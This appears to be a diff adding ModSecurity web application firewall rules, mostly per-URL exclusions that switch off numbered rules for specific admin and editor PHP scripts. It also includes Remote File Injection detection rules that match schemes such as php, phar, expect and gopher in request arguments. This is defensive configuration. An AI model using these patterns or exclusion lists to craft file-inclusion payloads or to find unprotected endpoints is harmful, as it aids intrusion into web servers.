+SecRule REQUEST_FILENAME "/maakpromotieorderb\.php" "phase:2,id:91783,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/admin/listcontent\.php" "phase:2,id:91784,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/showtable/update\.php" "phase:2,id:91785,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91786,t:none,pass,nolog,skipAfter:END_RULES_91786"
+
+SecRule ARGS|!ARGS:q|!ARGS:guid|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:330475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:q|!ARGS:guid|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:330476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91786
+
+SecRule REQUEST_FILENAME "/admin/locations/editphoto\.php" "phase:2,id:91787,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/translation_tool\.php" "phase:2,id:91788,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/edituserplugin\.php" "phase:2,id:91789,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/imp/mailbox\.php" "phase:2,id:91790,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/services/prefs\.php" "phase:2,id:91791,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/admin/update-page\.php" "phase:2,id:91792,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/uploadify/uploadify\.php" "phase:2,id:91793,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/admin/savestory\.php" "phase:2,id:91794,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/chat/server\.php" "phase:2,id:91795,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/cha-insertproduct\.php" "phase:2,id:91796,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/ezedit/server\.php" "phase:2,id:91797,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/cometchat_receive\.php" "phase:2,id:91798,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"
+
+SecRule REQUEST_FILENAME "/admin/news_editresult\.php" "phase:2,id:91799,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/admin/news\.php" "phase:2,id:91800,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/items_attribute_result\.php" "phase:2,id:91801,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/bcadmn/index\.php" "phase:2,id:91802,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/thub\.php" "phase:2,id:91803,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/sidenavsave\.php" "phase:2,id:91804,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/imp/message\.php" "phase:2,id:91805,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/cgi-bin/editor/wsd" "phase:2,id:91806,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/sitesettings\.php" "phase:2,id:91807,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/workadmin\.php" "phase:2,id:91808,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/addons/imagelibrary/select_image\.php" "phase:2,id:91809,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/news_edit\.php" "phase:2,id:91810,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-faq-css\.php" "phase:2,id:91811,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/cfk-action\.php" "phase:2,id:91812,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/htmle\.php" "phase:2,id:91813,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/product_edit\.php" "phase:2,id:91814,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cgi-bin/backuppc_admin" "phase:2,id:91815,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/delivery/spc\.php" "phase:2,id:91816,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/includes/share\.php" "phase:2,id:91817,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/kronolith/" "phase:2,id:91818,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/delivery/ajs\.php" "phase:2,id:91819,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/browse\.php" "phase:2,id:91820,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/watermark\.php" "phase:2,id:91821,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91822,t:none,pass,nolog,skipAfter:END_RULES_91822"
+
+SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:330477,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:330478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91822
+
+SecRule REQUEST_FILENAME "/addcontent\.php" "phase:2,id:91823,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/showmail\.php" "phase:2,id:91824,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/aprogram\.php" "phase:2,id:91825,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/admin/edit-event\.php" "phase:2,id:91826,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:91827,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:91828,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/company/modify\.php" "phase:2,id:91829,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/dimcp/setting\.php" "phase:2,id:91830,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/jg_radiof\.php" "phase:2,id:91831,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/tiki-editpage\.php" "phase:2,id:91832,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=380025"
+
+SecRule REQUEST_FILENAME "/power_news_add\.php" "phase:2,id:91833,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/jg_teksta\.php" "phase:2,id:91834,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/static_content_editresult\.php" "phase:2,id:91835,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/shopadmin/login\.php" "phase:2,id:91836,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/sgal_thumb\.php" "phase:2,id:91837,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/livehelp/image\.php" "phase:2,id:91838,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/ajax\.php" "phase:2,id:91839,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/saveconfig\.php" "phase:2,id:91840,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/products\.php" "phase:2,id:91841,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/edit-process\.php" "phase:2,id:91842,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:91843,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/freepost\.php" "phase:2,id:91844,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/advertpro/admin/admin\.pl" "phase:2,id:91845,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/inc/flash_to_db_insert\.php" "phase:2,id:91846,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/blocks/form/services\.php" "phase:2,id:91847,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/admin/settings/" "phase:2,id:91848,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/manager/ispmgr" "phase:2,id:91849,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
